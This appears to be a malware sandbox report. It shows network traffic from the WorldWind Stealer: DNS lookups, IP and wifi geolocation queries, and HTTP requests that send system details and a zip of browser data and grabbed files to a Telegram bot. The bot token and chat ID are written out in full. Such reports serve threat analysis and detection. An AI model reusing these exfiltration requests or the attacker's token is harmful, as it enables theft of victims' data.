                                                          Aug 13, 2024 21:49:00.841536045 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.452096939 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.457982063 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.458060980 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.753576040 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.754393101 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.754393101 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.754462957 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.754523993 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.754796982 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.754839897 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.754996061 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.755158901 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.755297899 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.755337000 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.755359888 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.755378008 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.755433083 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.755450964 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.755485058 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.755501032 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:01.755511045 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:01.756021023 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:02.208554029 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:02.208708048 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:02.209031105 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:02.211206913 CEST49746443192.168.2.4149.154.167.220
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 13, 2024 21:48:53.766128063 CEST6495853192.168.2.41.1.1.1
                                                          Aug 13, 2024 21:48:53.775346994 CEST53649581.1.1.1192.168.2.4
                                                          Aug 13, 2024 21:48:53.907340050 CEST5351953192.168.2.41.1.1.1
                                                          Aug 13, 2024 21:48:53.915663958 CEST53535191.1.1.1192.168.2.4
                                                          Aug 13, 2024 21:48:54.557135105 CEST4931153192.168.2.41.1.1.1
                                                          Aug 13, 2024 21:48:54.567019939 CEST53493111.1.1.1192.168.2.4
                                                          Aug 13, 2024 21:48:55.881959915 CEST5444553192.168.2.41.1.1.1
                                                          Aug 13, 2024 21:48:55.890739918 CEST53544451.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Aug 13, 2024 21:48:53.766128063 CEST192.168.2.41.1.1.10x3a9cStandard query (0)238.14.8.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                          Aug 13, 2024 21:48:53.907340050 CEST192.168.2.41.1.1.10x883fStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                          Aug 13, 2024 21:48:54.557135105 CEST192.168.2.41.1.1.10xa58aStandard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                          Aug 13, 2024 21:48:55.881959915 CEST192.168.2.41.1.1.10x230Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Aug 13, 2024 21:48:53.775346994 CEST1.1.1.1192.168.2.40x3a9cName error (3)238.14.8.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                          Aug 13, 2024 21:48:53.915663958 CEST1.1.1.1192.168.2.40x883fNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                          Aug 13, 2024 21:48:53.915663958 CEST1.1.1.1192.168.2.40x883fNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                          Aug 13, 2024 21:48:54.567019939 CEST1.1.1.1192.168.2.40xa58aNo error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                          Aug 13, 2024 21:48:54.567019939 CEST1.1.1.1192.168.2.40xa58aNo error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                          Aug 13, 2024 21:48:55.890739918 CEST1.1.1.1192.168.2.40x230No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                          • api.mylnikov.org
                                                          • api.telegram.org
                                                          • icanhazip.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449741104.16.185.241807740C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          TimestampBytes transferredDirectionData
                                                          Aug 13, 2024 21:48:53.971620083 CEST63OUTGET / HTTP/1.1
                                                          Host: icanhazip.com
                                                          Connection: Keep-Alive
                                                          Aug 13, 2024 21:48:54.482363939 CEST534INHTTP/1.1 200 OK
                                                          Date: Tue, 13 Aug 2024 19:48:54 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 12
                                                          Connection: keep-alive
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET
                                                          Set-Cookie: __cf_bm=xnCOZ5NHV9zRZsFybJd_9WNmuPiuMoRvrezzSBg6ikQ-1723578534-1.0.1.1-hwCmg.cjurGz3hL6B9wm.lJ.dzPRbFRBqoehMvZQmvapwpP_m.ZVj0156Xxa0ZXaRSxujKorCWjSXBbN9.gvlA; path=/; expires=Tue, 13-Aug-24 20:18:54 GMT; domain=.icanhazip.com; HttpOnly
                                                          Server: cloudflare
                                                          CF-RAY: 8b2b39b02dd60fa8-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                          Data Ascii: 8.46.123.33


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449742104.21.44.664437740C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-13 19:48:55 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                          Host: api.mylnikov.org
                                                          Connection: Keep-Alive
                                                          2024-08-13 19:48:55 UTC781INHTTP/1.1 200 OK
                                                          Date: Tue, 13 Aug 2024 19:48:55 GMT
                                                          Content-Type: application/json; charset=utf8
                                                          Content-Length: 88
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: max-age=2678400
                                                          CF-Cache-Status: MISS
                                                          Last-Modified: Tue, 13 Aug 2024 19:48:55 GMT
                                                          Accept-Ranges: bytes
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNfkBUGb3u1EkWCi70pd4pRgHRYSg41vv%2Fv6d1UCXS%2FRKlkxc8GSmXcXTTdAL3GE%2FNXirlGn0Y4IRr6p8NiHbZgkgeSPZbrss8TDjPJ3eubY%2BcNB1eJ4IfpnCZNfKwGG5WVw"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Strict-Transport-Security: max-age=0; preload
                                                          X-Content-Type-Options: nosniff
                                                          Server: cloudflare
                                                          CF-RAY: 8b2b39b4be044394-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-13 19:48:55 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 33 35 37 38 35 33 35 7d
                                                          Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1723578535}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449743149.154.167.2204437740C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-13 19:48:56 UTC1803OUTGET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs* [TRUNCATED]
                                                          Host: api.telegram.org
                                                          Connection: Keep-Alive
                                                          2024-08-13 19:48:56 UTC389INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 13 Aug 2024 19:48:56 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 2073
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-08-13 19:48:56 UTC2073INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 37 35 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 39 31 32 30 35 39 37 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 6d 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6d 64 61 34 30 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 30 31 38 32 32 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 68 61 6d 65 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 61 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 75 6b 65 6f 6d 64 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 33 35 37 38 35 33 36 2c 22 74 65 78 74 22 3a 22
                                                          Data Ascii: {"ok":true,"result":{"message_id":147548,"from":{"id":5912059723,"is_bot":true,"first_name":"Omda","username":"omda404bot"},"chat":{"id":750182271,"first_name":"Mohamed","last_name":"Emad","username":"dukeomda","type":"private"},"date":1723578536,"text":"


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449744149.154.167.2204437740C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-13 19:48:58 UTC170OUTGET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                          Host: api.telegram.org
                                                          2024-08-13 19:48:58 UTC388INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 13 Aug 2024 19:48:58 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 295
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-08-13 19:48:58 UTC295INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 37 35 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 39 31 32 30 35 39 37 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 6d 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6d 64 61 34 30 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 30 31 38 32 32 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 68 61 6d 65 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 61 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 75 6b 65 6f 6d 64 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 33 35 37 38 35 33 38 2c 22 74 65 78 74 22 3a 22
                                                          Data Ascii: {"ok":true,"result":{"message_id":147549,"from":{"id":5912059723,"is_bot":true,"first_name":"Omda","username":"omda404bot"},"chat":{"id":750182271,"first_name":"Mohamed","last_name":"Emad","username":"dukeomda","type":"private"},"date":1723578538,"text":"


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449745149.154.167.2204437740C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-13 19:48:59 UTC253OUTPOST /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271 HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary="aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636"
                                                          Host: api.telegram.org
                                                          Content-Length: 162674
                                                          Expect: 100-continue
                                                          2024-08-13 19:49:00 UTC40OUTData Raw: 2d 2d 61 61 35 63 36 66 37 66 2d 63 33 63 62 2d 34 66 32 64 2d 38 34 35 32 2d 62 33 66 30 62 37 30 34 39 36 33 36 0d 0a
                                                          Data Ascii: --aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636
                                                          2024-08-13 19:49:00 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 5c 6a 6f 6e 65 73 40 35 32 38 31 31 30 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 25 35 43 6a 6f 6e 65 73 25 34 30 35 32 38 31 31 30 5f 65 6e 2d
                                                          Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C4a3035c4cb9343f74ca34670ddce645d%5Cuser%40528110_en-
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 78 ab 0d 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                          Data Ascii: PKxYBrowsers\Edge\PK~YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK~YceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: 7c 5c fa 6c 7e 05 df 60 ad 15 5c 2e c6 42 65 ed c3 95 75 39 ce ad 30 98 b5 9b 01 13 80 d8 69 88 5b 9d 1e d7 59 c0 10 42 2c d5 27 f6 66 f2 7b 3e a5 7c 1b ea 8e ed 7d 2d cc ad b7 f7 49 3a 59 59 a7 ba ef c3 27 e4 a4 ed 40 85 96 b9 b8 f2 22 f9 55 09 c0 8f f7 59 dd 0f c4 72 ae e5 17 e4 e2 8d 60 71 b7 3e 2a cc 16 47 4e 26 d6 e6 36 88 7e dd 7a 32 e6 df bf ff 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 2f 31 d7 cb 82 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 65 73 6b 74 6f 70 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 4c 54 4b 4d 59 42 53 45 59 5a 2e 64 6f 63 78 0d 53 49 92 45 21 08 db 77 d5 3f 94 02 8a f3 c3 59 ef 7f 90 76 45 89 01 4d 02 b1 87 74 74 a3 73 4f 5c 1a a3 1c 69 96 81 42 49 c3 b6 54
                                                          Data Ascii: |\l~`\.Beu90i[YB,'f{>|}-I:YY'@"UYr`q>*GN&6~z2PKT@DW/1>Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\LTKMYBSEYZ.docxSIE!w?YvEMttsO\iBIT
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb 37 75 c1 35 1b 3a 17 5e 1f df 36 12 42 91 e6 76 6f 67 c3 81 90 70 6b 1b ef f9 c7 41 e5 cd 3a e7 97 0e 5f 7f 7f fe 00 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 91 6c 91 87 85 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 5a 42 45 44 43 4a 50 42 45 59 2e 6a 70 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 04 15 45 71 9e ef 7f 90 fe bd 81 84 05 54 ea 15 0f 8c 46 2e 60 ae 7e 95 70 0d 12 d0 aa a3 9c
                                                          Data Ascii: P{(eM=h]od1ad'*Dc".xR[>fj|/oViw&D7u5:^6BvogpkA:_PKT@DWl?Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\ZBEDCJPBEY.jpgI@!DEqTF.`~p
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: ad 29 d9 06 8b d1 80 9e 93 2f 9f 5a 67 df b8 9b a2 51 f6 3b 25 ba 00 17 6b 3b 61 1e e2 b4 2d b0 24 2e 73 62 59 58 41 1c c2 a7 d6 23 df 0c a5 f3 03 b8 b1 38 70 c0 00 b0 3a f9 61 20 ef 02 8f d2 0f cc 9d 05 04 0d 15 12 11 d9 f2 e7 aa 21 01 03 c2 ca 6b 10 26 56 50 82 b3 ff 25 17 61 8f dc e0 fd 91 74 b0 e0 04 94 20 20 52 ff 17 2c 0e 3a fc a6 7b 00 16 20 95 c3 30 b0 80 60 82 e4 b8 05 23 81 1e 98 de 27 a2 90 60 fe 87 42 a4 33 4b d0 69 05 27 9d 11 d0 9b 02 70 36 b0 93 18 51 3a 16 89 0b ce 19 83 67 a3 71 64 3e 16 11 48 64 96 1b 8c 41 b3 32 99 88 73 20 b0 48 b8 4e 94 c9 88 83 c4 c2 04 19 1e 7a c1 61 38 42 87 ce 5c 68 80 72 41 15 84 b9 69 4e 0f d1 0c 47 66 ef f5 41 05 70 7c d6 18 dd 63 33 03 89 d9 6d 44 31 ca 74 58 0c 09 89 c7 98 f4 73 68 f1 a9 f5 52 3d 75 9a 01 71
                                                          Data Ascii: )/ZgQ;%k;a-$.sbYXA#8p:a !k&VP%at R,:{ 0`#'`B3Ki'p6Q:gqd>HdA2s HNza8B\hrAiNGfAp|c3mD1tXshR=uq
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: 9b 7d 9a bf f3 11 ae 90 1f 4e 7d 99 98 7d 7f 16 05 38 7a 94 1c 81 55 d4 79 2f 8a 79 f4 07 66 cd d3 f7 97 fc 15 b8 d9 07 fd b9 69 4d f6 45 56 18 c4 2b e4 c4 70 b7 e9 ca f0 d7 d9 c5 5b af 57 1e ff f8 d6 c4 b8 88 43 0e 48 7b 6e ed 9c dd ae 23 20 4d d0 38 2e b9 4c 1b e8 34 a7 be a7 7c 2c f8 3c 87 ba 3d f6 60 73 d2 ae dc 91 21 9b af fc dd 68 ab 5a bc 72 66 d5 11 0a f0 ee b1 34 e6 5e 91 8f b8 3d e5 b4 e1 80 02 66 f1 1b 33 d8 37 1d 83 55 61 8c c3 03 63 32 4f 58 5a 0b bb fa ef d7 86 3e f5 9f 84 6e 56 8a 90 c6 5b cb 99 0e 1f 89 91 6d c6 94 68 8d 67 f6 70 75 2e 71 24 64 31 8e 7d 68 7b 22 40 1e dd 49 32 f1 e9 3b 71 ab 46 a8 54 fc 5d e1 fd b6 3b 65 8f 1a 4e af ed 73 a6 bf 1d 15 f1 b7 c1 75 0f 7a 09 1b 9b e9 cd ae f0 9b 4e ad 72 79 8e 3b 4f f0 40 d4 98 58 2a 8a fd 58
                                                          Data Ascii: }N}}8zUy/yfiMEV+p[WCH{n# M8.L4|,<=`s!hZrf4^=f37Uac2OXZ>nV[mhgpu.q$d1}h{"@I2;qFT];eNsuzNry;O@X*X
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: 65 ba 24 3b 75 df 3c 6d 26 33 5f 7c de 8b c2 7e ca 36 6e 31 1e 6f 9d 10 ae bf 6e 85 e6 3a e7 14 78 02 ab ab 38 a0 a9 fa 44 df 94 30 24 17 47 8b 13 12 64 6b 56 22 b8 1d 2f 79 e3 10 3f 7e 9a 81 f7 a6 2a 9a 3c 06 1f bc be 7b 1e 30 7c f2 2a f5 d8 d0 ad a4 24 f8 c1 3e 63 85 aa 98 9f f6 ad c3 35 a7 81 ea 8b 1b 0d 68 7d af d7 0f 9c ba 1e 80 c2 a8 9b 7e e2 37 89 fd 6f 25 5e 37 20 94 67 7d 6d f8 38 0a 9b 0d e9 72 96 6e ec 63 71 d8 09 2d 1b 4f ab 9f 12 36 1c ad 05 fb d9 84 1d 89 47 b0 c1 76 44 2e b7 64 58 c0 ec 9d 69 ca 3d b1 cf 86 24 4d 85 74 d6 48 c9 0d 7f 42 89 da 33 cc 9d d9 f6 db 45 da 68 37 55 b9 57 82 c6 ed da 81 b0 67 25 3d a4 41 da a8 eb ac 13 74 98 69 a5 8e d9 76 df 72 8e 6f 74 5d 1d 11 b1 4e 50 c1 ca ec 04 ab 05 81 2f 54 12 dc d2 d1 12 3e 7a 66 6b 98 a8
                                                          Data Ascii: e$;u<m&3_|~6n1on:x8D0$GdkV"/y?~*<{0|*$>c5h}~7o%^7 g}m8rncq-O6GvD.dXi=$MtHB3Eh7UWg%=Ativrot]NP/T>zfk
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: eb 4b b7 d2 22 c3 94 4d b4 26 b6 87 88 ba 55 85 d2 57 53 d4 35 53 29 22 73 4a 0b c2 9d a5 96 b2 78 45 55 ef 52 a9 cc b1 9c 9a dc 97 33 9c 05 f7 7c 45 56 31 55 5e d8 38 d9 4e a9 0d 52 34 42 a8 03 93 25 ed b3 e3 45 9f c8 69 89 ed 66 56 5c 26 99 7a 98 e6 ef a8 db c0 9a 4a 93 c0 1f d9 7e 34 27 9b 72 05 b3 6a 3a 60 d0 08 07 b4 93 b0 84 c7 28 b0 f8 14 8f 1f 9b fc 24 5b 3c c8 bf a5 ea d7 48 2a af 38 72 6f 70 5b ee 6f 7a 0f 52 ef ba d2 51 e3 36 f6 8b 7d 4d fb ec b7 d7 1b 99 19 35 05 55 54 74 b4 32 69 3d 95 5c 5b 1a b9 71 f8 99 11 8d ae 70 20 34 54 f4 4e ff 78 0a a3 df 88 49 e7 1e 20 1f de 91 15 d8 85 fa 62 7f ad c6 6e 84 e1 32 cc da 11 35 db fd 9a bd c4 75 41 f8 a8 64 bf 2c 5e d2 3c 22 a1 ad 12 74 e2 db 96 15 ed fc 32 df 76 b4 e9 c8 fe b9 ad 0b 10 e6 9f 0a 2e 5e
                                                          Data Ascii: K"M&UWS5S)"sJxEUR3|EV1U^8NR4B%EifV\&zJ~4'rj:`($[<H*8rop[ozRQ6}M5UTt2i=\[qp 4TNxI bn25uAd,^<"t2v.^
                                                          2024-08-13 19:49:00 UTC16355OUTData Raw: b7 ee 1f 53 d5 55 dd fb e9 5d 6b 3f b6 d7 5e 6b ed b5 7e bf 95 6d 0d be f3 e0 1a 2b d2 c6 45 97 95 76 c7 e5 61 c2 45 28 86 3e 8d a5 51 0b aa 88 66 15 63 46 93 18 78 25 7b ee d8 a9 d0 7a 3b b8 c3 24 cf 72 9e 64 15 5d 1b 7d d5 93 51 82 f6 d4 9d 44 df a1 89 93 2b 6a a2 f4 60 f2 ed ad 28 ff cf c8 38 59 37 2f ce cf 9a ab 7e 86 21 0f 10 84 4f 82 72 85 e3 25 32 05 4b cb b8 9d 44 33 30 3d 14 7d a7 79 d4 b8 1f a0 39 d0 0f f1 63 83 62 bb 7b ae 65 1a 5a 72 9d ca 97 74 45 9f 28 68 c9 f9 86 f1 a7 07 30 68 f2 4e 61 e6 dd 8e f4 4e 53 d6 cb c2 c9 b0 98 7e 85 13 37 3a 18 8c 7a 61 8f 17 2f d7 c1 c7 ff 4b 13 6c 6f 63 b4 a2 98 b8 5e 27 75 dd 21 77 09 33 4e 31 31 82 75 d3 fa 9b 2d de 67 72 e2 26 71 08 90 d1 fd c3 29 b0 87 f2 6b 55 14 34 41 9e aa 99 62 ba de cd c8 8e 3b 19 39
                                                          Data Ascii: SU]k?^k~m+EvaE(>QfcFx%{z;$rd]}QD+j`(8Y7/~!Or%2KD30=}y9cb{eZrtE(h0hNaNS~7:za/Kloc^'u!w3N11u-gr&q)kU4Ab;9
                                                          2024-08-13 19:49:00 UTC25INHTTP/1.1 100 Continue
                                                          2024-08-13 19:49:00 UTC901INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 13 Aug 2024 19:49:00 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 513
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
